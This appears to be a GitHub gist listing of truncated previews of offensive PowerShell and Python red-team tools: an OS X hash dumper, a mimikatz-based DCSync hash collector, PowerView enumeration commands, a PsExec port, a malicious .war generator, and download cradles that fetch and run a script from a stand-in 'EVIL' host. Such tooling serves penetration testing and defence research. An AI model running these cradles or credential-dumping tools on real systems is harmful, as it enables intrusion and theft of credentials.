This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# extracts OSX user hashes and outputs a format crackable with oclHashcat | |
# adapted from http://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored | |
# and https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/ | |
# | |
# automation of approach by @harmj0y | |
# | |
# sudo ./osx_hashdump.py | |
# ./oclHashcat64.bin -m 7100 hash.txt wordlist.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Invoke-HostFile { | |
<# | |
.SYNOPSIS | |
Hosts a base64 string representation of a binary file or a given | |
$FilePath on the specified $Port. Any HTTP request to the given | |
host/port will return the binary data of the specified file. | |
.PARAMETER Base64File | |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-DCSync | |
{ | |
<# | |
.SYNOPSIS | |
Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
Author: @monoxgas | |
Invoke-ReflectivePEInjection |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-ThreadedFunction { | |
[CmdletBinding()] | |
param( | |
[Parameter(Position=0,Mandatory=$True)] | |
[String[]] | |
$ComputerName, | |
[Parameter(Position=1,Mandatory=$True)] | |
[System.Management.Automation.ScriptBlock] | |
$ScriptBlock, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) | |
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | |
# get all the groups a user is effectively a member of, 'recursing up' | |
Get-NetGroup -UserName <USER> | |
# get all the effective members of a group, 'recursing down' | |
Get-NetGroupMember -GoupName <GROUP> -Recurse | |
# get the effective set of users who can administer a server |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Translate-Canonical { | |
<# | |
.SYNOPSIS | |
Converts a user@fqdn to NT4 format. | |
.LINK | |
http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats | |
#> | |
[CmdletBinding()] | |
param( | |
[String]$User |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Code that quickly generates a deployable .war for a PowerShell one-liner | |
import zipfile | |
import StringIO | |
import sys | |
def generatePsWar(psCmd, appName): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-PsExec { | |
<# | |
.SYNOPSIS | |
This function is a rough port of Metasploit's psexec functionality. | |
It utilizes Windows API calls to open up the service manager on | |
a remote machine, creates/run a service with an associated binary | |
path or command, and then cleans everything up. | |
Either a -Command or a custom -ServiceEXE can be specified. | |
For -Commands, a -ResultsFile can also be specified to retrieve the |